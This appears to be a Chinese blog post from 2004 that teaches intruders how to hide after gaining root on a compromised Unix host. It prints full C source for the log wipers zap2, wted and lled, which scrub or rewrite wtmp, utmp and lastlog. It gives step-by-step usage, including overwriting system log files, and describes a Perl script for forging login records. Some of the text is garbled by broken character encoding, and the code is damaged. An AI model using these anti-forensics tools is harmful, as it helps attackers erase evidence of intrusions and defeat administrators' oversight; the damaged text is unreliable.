进入系统后如何隐藏自己

原创 2004年08月29日 20:24:00
进入系统后如何隐藏自己
Zap2 (清除 wtmp/lastlog/utmp记录) 

网络上有很多不同的日志清除程序,其中最好的是zap2。我编译后称为z2 
在你获得root的访问权后立即运行z2这个程序。这个程序执行的非常快。
你可以使用finger @host.xxx来查看当前有说锹剂耍邢腹鄄煲幌聄oot或admin的idle time(空闲时间)
来猜测他们是否离开主机了。
Login, ?ú????oóá¢?′ê?è?wà′2é?′idle timeoí???úóD?????á??£ ????ó?"w"2é?′??í3oí??ê?è?ê1
×??o3é?aroot???üá?ê?2??üí?ê±??DD???£ò?????????á?root??·??ê訣?á¢?′ê?è? ./z2 ??????
??í3?ùó???ó??§???£ 
现在你比刚才就安全多了。现在再用"w"或"who"命令来查看一下,你已静换岜籾tmp记录了。如果你要使
用 ftp或其它的一些命令你可能就会用到我在本章中提供的另外两个程序 wted 和 lled。 
我们先来完成z2这个程序。你必须了解每个文件在你入侵的系统中的位置以便修改z2.c,使其包含这些
文件的正确路径。
下面是在文件头部的需要你修改的部分。
#define WTMP_NAME "/usr/adm/wtmp" 
#define UTMP_NAME "/etc/utmp" 
#define LASTLOG_NAME "/usr/adm/lastlog" 
在有些系统中应该是:
#define WTMP_NAME "/var/adm/wtmp" 
#define UTMP_NAME "/var/adm/utmp" 
#define LASTLOG_NAME "/var/adm/lastlog" 

但你应该自己查看一下这些文件存放在你要入侵的系统的什么位置。/var/log目录也是很可能的一个路径。
修改好正确的文件路径后,编译这个文件,现在你登录之后运行z2,你就已比较安全了。
这里是c程序:
z2.c 
--------------------------- cut here 
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#define WTMP_NAME "/usr/adm/wtmp" 
#define UTMP_NAME "/etc/utmp" 
#define LASTLOG_NAME "/usr/adm/lastlog" 

int f; 

void kill_utmp(who) 
char *who; 

struct utmp utmp_ent; 

if ((f=open(UTMP_NAME,O_RDWR))>=0) { 
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) 
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { 
bzero((char *)&utmp_ent,sizeof( utmp_ent )); 
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); 
write (f, &utmp_ent, sizeof (utmp_ent)); 

close(f); 



void kill_wtmp(who) 
char *who; 

struct utmp utmp_ent; 
long pos; 

pos = 1L; 
if ((f=open(WTMP_NAME,O_RDWR))>=0) { 

while(pos != -1L) { 
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); 
if (read (f, &utmp_ent, sizeof (struct utmp))<0) { 
pos = -1L; 
} else { 
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { 
bzero((char *)&utmp_ent,sizeof(struct utmp )); 
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); 
write (f, &utmp_ent, sizeof (utmp_ent)); 
pos = -1L; 
} else pos += 1L; 


close(f); 



void kill_lastlog(who) 
char *who; 

struct passwd *pwd; 
struct lastlog newll; 

if ((pwd=getpwnam(who))!=NULL) { 

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { 
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); 
bzero((char *)&newll,sizeof( newll )); 
write(f, (char *)&newll, sizeof( newll )); 
close(f); 


} else printf("%s: ?/n",who); 


main(argc,argv) 
int argc; 
char *argv[]; 

if (argc==2) { 
kill_lastlog(argv[1]); 
kill_wtmp(argv[1]); 
kill_utmp(argv[1]); 
printf("Zap2!/n"); 
} else 
printf("Error./n"); 

--------------------------- cut here 


--------------------------------------------------------------------------------

其它脚本程序 

我们开始本章的另一部分。我们假设你登录并执行了z2,你需要进行ftp来抓一个文件(记住,象第一
章所说的,不要ftp或telent出这个入侵的主机)。好了,你ftp进入系统抓取几个文件,或登录到系统
的其它帐户中,那现在你就要用到wted程序了。 wted程序允许你编紈tmp日志来清除你ftp留下的记录。
你也可能要用到lled (编糽astlog日志). 
你在修改日志的路径并编译wted程序后,输入 ./wted将会出现下面的菜单。
[8:25pm][/home/compile]wted 
Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST 
-h This help 帮助
-f Use FILE instead of default 所使用的非默认文件
-a Show all entries found 显示所有的记录
-u Show all entries for USER 显示USER的所有记录
-b Show NULL entries 显示空记录
-e Erase USER completely 完全清除某用户的记录
-c Erase all connections containing HOST 清除从某主机来的所有记录
-z Show ZAP'd entries ??ê?ó?ZAP′|àí1y??????
-x Attempt to remove ZAP'd entries completely é?3yó?ZAP′|àí1y??????
如果你ftp使用的用户名为 tsmith,你应这样使用 wted -x -e tsmith 
这个程序将显示用户tsmith登录的一个时间并询问你是否要删除它。在你删除你登录的记录后,记着
chmod 644 wtmp.tmp文件然后将其拷贝到日志文件的目录并覆盖岳吹奈募O笳庋? 
1. chmod 644 wtmp.tmp 
2. cp wtmp.tmp /var/adm/wtmp 
下面是wted程序:
重要:记着将char里面文件改成正确的路径。 
wted.c 
---------------------- cut here 
#include  
#include  
#include  
#include  
char *file="/var/adm/wtmp"; 
main(argc,argv) 
int argc; 
char *argv[]; 

int i; 
if (argc==1) usage(); 
for(i=1;i{ 
if(argv[i][0] == '-') 

switch(argv[i][1]) 

case 'b': printents(""); break; 
case 'z': printents("Z4p"); break; 
case 'e': erase(argv[i+1],0); break; 
case 'c': erase(0,argv[i+1]); break; 
case 'f': file=argv[i+1]; break; 
case 'u': printents(argv[i+1]); break; 
case 'a': printents("*"); break; 
case 'x': remnull(argv[i+1]); break; 
default:usage(); 




printents(name) 
char *name; 

struct utmp utmp,*ptr; 
int fp=-1; 
ptr=&utmp; 
if (fp=open(file,O_RDONLY)) 

while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) 

if ( !(strcmp(name,ptr->ut_name)) || (name=="*") || 
(!(strcmp("Z4p",name)) && (ptr->ut_time==0))) 
printinfo(ptr); 

close(fp); 


printinfo(ptr) 
struct utmp *ptr; 

char tmpstr[256]; 
printf("%s/t",ptr->ut_name); 
printf("%s/t",ptr->ut_line); 
strcpy(tmpstr,ctime(&(ptr->ut_time))); 
tmpstr[strlen(tmpstr)-1]='/0'; 
printf("%s/t",tmpstr); 
printf("%s/n",ptr->ut_host); 

erase(name,host) 
char *name,*host; 

int fp=-1,fd=-1,tot=0,cnt=0,n=0; 
struct utmp utmp; 
unsigned char c; 
if (fp=open(file,O_RDONLY)) { 
fd=open("wtmp.tmp",O_WRONLY|O_CREAT); 
while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) { 
if (host) 
if (strstr(utmp.ut_host,host)) tot++; 
else {cnt++;write(fd,&utmp,sizeof(struct utmp));} 
if (name) { 
if (strcmp(utmp.ut_name,name)) {cnt++; 
write(fd,&utmp,sizeof(struct utmp));} 
else { 
if (n>0) { 
n--;cnt++; 
write(fd,&utmp,sizeof(struct utmp));} 
else 

printinfo(&utmp); 
printf("Erase entry (y/n/f(astforward))? "); 
c='a'; 
while (c!='y'&&c!='n'&&c!='f') c=getc(stdin); 
if (c=='f') { 
cnt++; 
write(fd,&utmp,sizeof(struct utmp)); 
printf("Fast forward how many entries? "); 
scanf("%d",&n);} 
if (c=='n') { 
cnt++; 
write(fd,&utmp,sizeof(struct utmp)); 

if (c=='y') tot++; 

} } 

close(fp); 
close(fd); 

printf("Entries stored: %d Entries removed: %d/n",cnt,tot); 
printf("Now chmod wtmp.tmp and copy over the original %s/n",file); 

remnull(name) 
char *name; 

int fp=-1,fd=-1,tot=0,cnt=0,n=0; 
struct utmp utmp; 
if (fp=open(file,O_RDONLY)) { 
fd=open("wtmp.tmp",O_WRONLY|O_CREAT); 
while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) { 
if (utmp.ut_time) { 
cnt++; 
write(fd,&utmp,sizeof(struct utmp)); 

else 
tot++; 

close(fp); 
close(fd); 

printf("Entries stored: %d Entries removed: %d/n",cnt,tot); 
printf("Now chmod wtmp.tmp and copy over the original %s/n",file); 

usage() 

printf("Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST/n"); 
printf("/t-h/tThis help/n"); 
printf("/t-f/tUse FILE instead of default/n"); 
printf("/t-a/tShow all entries found/n"); 
printf("/t-u/tShow all entries for USER/n"); 
printf("/t-b/tShow NULL entries/n"); 
printf("/t-e/tErase USER completely/n"); 
printf("/t-c/tErase all connections containing HOST/n"); 
printf("/t-z/tShow ZAP'd entries/n"); 
printf("/t-x/tAttempt to remove ZAP'd entries completely/n"); 

---------------------- cut here 
你可能还需要清除/vat/adm/lastlog日志。 
这要用到lled.c程序。编译这个文件并命名为lled. 
你运行lled程序将会出现下面的菜单: 
[4:04am][/home/paris/compile]lled 
Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST 
-h This help °??ú
-f Use FILE instead of default ê1ó????¨?????t′úì?è±ê???
-a Show all entries found ??ê?è?2?????
-u Show all entries for USER ??ê????¨ó??§??è?2?????
-b Show NULL entries ??ê???????
-e Erase USER completely è?2?é?3y???¨ó??§??????
-c Erase all connections containing HOST é?3y°üo????¨?÷?ú??è?2?????
-z Show ZAP'd entries ??ê?ó?ZAP′|àí1y??????
-x Attempt to remove ZAP'd entries completely é?3yó?ZAP′|àí1y??????
你可以先用-u来看一下,很多时候你的用户名并没有记录下来,但会记录下你的主机,一般你可以这
样使用:(假设我进入系统时使用的主机名为machine.edit.com)
lled -e username -c machine.edit 
如果你要查看你的主机是否记录在lastlog日志的结尾,你应输入:lled -a 
使用chmod将 lastlog.tmp文件属性改为 644并象你使用上面的wted程序一样将其拷贝到日志文件的目
录中并覆盖岳吹奈募?
重要:将lastlog路径设置为你入侵的主机中的正确路径。
下面是lled.c: 
-------------------------- cut here 
#include  
#include  
#include  
#include  
char *file="/var/adm/lastlog"; 
main(argc,argv) 
int argc; 
char *argv[]; 

int i; 
if (argc==1) usage(); 
for(i=1;i{ 
if(argv[i][0] == '-') 

switch(argv[i][1]) 

case 'b': printents(""); break; 
case 'z': printents("Z4p"); break; 
case 'e': erase(argv[i+1]); break; 
case 'c': erase(0,argv[i+1]); break; 
case 'f': file=argv[i+1]; break; 
case 'u': printents(argv[i+1]); break; 
case 'a': printents("*"); break; 
case 'x': remnull(argv[i+1]); break; 
default:usage(); 




printents(name) 
char *name; 

struct lastlog utmp,*ptr; 
int fp=-1; 
ptr=&utmp; 
if (fp=open(file,O_RDONLY)) 

while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) 

if ( !(strcmp(name,ptr->ll_line)) || (name=="*") || 
(!(strcmp("Z4p",name)) && (ptr->ll_time==0))) 
printinfo(ptr); 

close(fp); 


printinfo(ptr) 
struct lastlog *ptr; 

char tmpstr[256]; 
printf("%s/t",ptr->ll_line); 
strcpy(tmpstr,ctime(&(ptr->ll_time))); 
tmpstr[strlen(tmpstr)-1]='/0'; 
printf("%s/t",tmpstr); 
printf("%s/n",ptr->ll_host); 

erase(name,host) 
char *name,*host; 

int fp=-1,fd=-1,tot=0,cnt=0,n=0; 
struct lastlog utmp; 
unsigned char c; 
if (fp=open(file,O_RDONLY)) { 
fd=open("lastlog.tmp",O_WRONLY|O_CREAT); 
while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) { 
if (host) 
if (strstr(utmp.ll_host,host)) tot++; 
else {cnt++;write(fd,&utmp,sizeof(struct lastlog));} 
if (name) { 
if (strcmp(utmp.ll_line,name)) {cnt++; 
write(fd,&utmp,sizeof(struct lastlog));} 
else { 
if (n>0) { 
n--;cnt++; 
write(fd,&utmp,sizeof(struct lastlog));} 
else 

printinfo(&utmp); 
printf("Erase entry (y/n/f(astforward))? "); 
c='a'; 
while (c!='y'&&c!='n'&&c!='f') c=getc(stdin); 
if (c=='f') { 
cnt++; 
write(fd,&utmp,sizeof(struct lastlog)); 
printf("Fast forward how many entries? "); 
scanf("%d",&n);} 
if (c=='n') { 
cnt++; 
write(fd,&utmp,sizeof(struct lastlog)); 

if (c=='y') tot++; 

} } 

close(fp); 
close(fd); 

printf("Entries stored: %d Entries removed: %d/n",cnt,tot); 
printf("Now chmod lastlog.tmp and copy over the original %s/n",file); 

remnull(name) 
char *name; 

int fp=-1,fd=-1,tot=0,cnt=0,n=0; 
struct lastlog utmp; 
if (fp=open(file,O_RDONLY)) { 
fd=open("lastlog.tmp",O_WRONLY|O_CREAT); 
while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) { 
if (utmp.ll_time) { 
cnt++; 
write(fd,&utmp,sizeof(struct lastlog)); 

else 
tot++; 

close(fp); 
close(fd); 

printf("Entries stored: %d Entries removed: %d/n",cnt,tot); 
printf("Now chmod lastlog.tmp and copy over the original %s/n",file); 

usage() 

printf("Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST/n"); 
printf("/t-h/tThis help/n"); 
printf("/t-f/tUse FILE instead of default/n"); 
printf("/t-a/tShow all entries found/n"); 
printf("/t-u/tShow all entries for USER/n"); 
printf("/t-b/tShow NULL entries/n"); 
printf("/t-e/tErase USER completely/n"); 
printf("/t-c/tErase all connections containing HOST/n"); 
printf("/t-z/tShow ZAP'd entries/n"); 
printf("/t-x/tAttempt to remove ZAP'd entries completely/n"); 

---------------------------------------------------------------- cut here 
下面是个编辑tmp, wtmp和检查进程的很好的perl脚本程序。这个程序还允许你在wtmp日志中加入一行。
如果你想搞,你可以加入clinton(克林顿).whitehouse(白宫).gov logging into port ttyp3 并显示
他在系统中停留了几个小时!
使用检查功能,你可以知道是否有什么人登录到系统中而在utmp日志中又没有记录。系统管理员有时登
录后喜欢把自己隐藏起来,这个程序可以看到他们是否在线。你必须有root的权限来执行这个程序,这
个程序还需要5.003以上的版本才能运行。启动这个脚本程序后输入help。
下面是一些基本命令:
starts by loading wtmp 
delete user username 
delete host hostanme 
write 
read wtmp 
delete user username 
delete host hostname 
write 
使用help来查看其它的命令......这是最好的wtmp,wtmp编计鳎?
说声谢谢吧 ;)  

Mac系统中进入隐藏文件夹

利用Finder进入文件夹
  • u012566895
  • u012566895
  • 2016年02月02日 14:30
  • 345

Truecrypt隐形操作系统终极方案

一、适用场合 记得有个倒霉蛋在车站莫名其妙被警察叔叔请去检查笔记本电脑的那个新闻吗?如果当事人会用truecrypt加密软件(以下简称TC),并会应用此方案,就不会发生那样的悲剧了。这个方案可以防止...
  • cncrypt
  • cncrypt
  • 2016年06月02日 11:56
  • 781

如何隐藏Windows7 系统保留分区

如何隐藏Windows7 系统保留分区
  • wangshuxuncom
  • wangshuxuncom
  • 2015年06月23日 09:20
  • 2569

隐藏Activity到后台而不关闭

moveTaskToBack()方法:在activity中调用 moveTaskToBack (boolean nonRoot)方法即可将activity 退到后台,注意不是finish()退出。 ...
  • j20lin
  • j20lin
  • 2016年07月04日 15:42
  • 1504

Mac中直接打开隐藏的文件或文件夹

http://hi.baidu.com/54827158/blog/item/520a7c4669ebd8009313c606.html http://www.dengor.com/archiv...
  • idaretobe
  • idaretobe
  • 2015年05月24日 16:15
  • 715

android 隐藏系统键盘

-----------------------------------------已验证-----------------------------------  public static vo...
  • q610098308
  • q610098308
  • 2016年02月03日 13:18
  • 1410

在windows7系统中显示和隐藏系统保留盘

在windows7系统中显示和隐藏系统保留盘 工具/原料 安装有windows7系统的电脑 步骤/方法 ...
  • sdujava2011
  • sdujava2011
  • 2016年03月17日 09:45
  • 846

如何更改文件或文件夹的系统隐藏属性

随着电脑病毒的猖獗,很多次我们在机房或者教师拷贝课件的时候都会中毒,虽然我们能够杀掉这个病毒,但是有些病毒会更改文件或者文件夹的系统隐藏属性。而且这是灰色的,我们没办法更改。遇到这个问题,应该如何解决...
  • lk142500
  • lk142500
  • 2015年12月07日 16:26
  • 1491

把一个文件夹变成一个隐藏受保护的系统文件

在windows下 在cmd 操作窗口下 使用命令 attrib 1.txt +s +h 或者 attrib c:\1.txt +s +h 解释名词 attrib(主命令...
  • cdp19930414
  • cdp19930414
  • 2016年10月14日 12:13
  • 1077

iOS_隐藏系统音量(MPVolumeView初探)

有些应用会需要我们隐藏系统的音量 HUD 提示框,之前我们都是用 “MPMusicPlayerController” 来进行隐藏,但在iOS7.0之后我们发现可以使用 “MPVolumeView” 来...
  • siwen1990
  • siwen1990
  • 2016年08月25日 16:02
  • 2777
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:进入系统后如何隐藏自己
举报原因:
原因补充:

(最多只允许输入30个字)